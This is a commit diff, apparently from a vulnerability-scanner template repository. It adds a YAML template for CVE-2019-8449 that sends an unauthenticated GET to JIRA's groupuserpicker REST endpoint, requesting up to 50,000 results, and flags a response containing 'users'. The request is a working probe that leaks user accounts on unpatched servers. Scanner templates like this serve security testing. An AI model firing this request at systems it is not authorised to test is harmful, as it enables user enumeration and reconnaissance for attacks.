commit
3c28475816
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2019-8449
|
||||
|
||||
info:
|
||||
name: JIRA Unauthenticated Sensitive Information Disclosure
|
||||
author: Harsh Bothra
|
||||
severity: medium
|
||||
|
||||
# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "users"
|
||||
part: body
|
Loading…
Reference in New Issue